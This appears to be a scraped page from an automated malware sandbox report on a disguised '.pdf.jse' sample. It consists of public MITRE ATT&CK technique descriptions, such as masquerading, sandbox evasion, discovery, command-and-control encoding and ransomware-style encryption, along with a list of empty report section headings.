Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Signature Similarity

Similar Samples

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre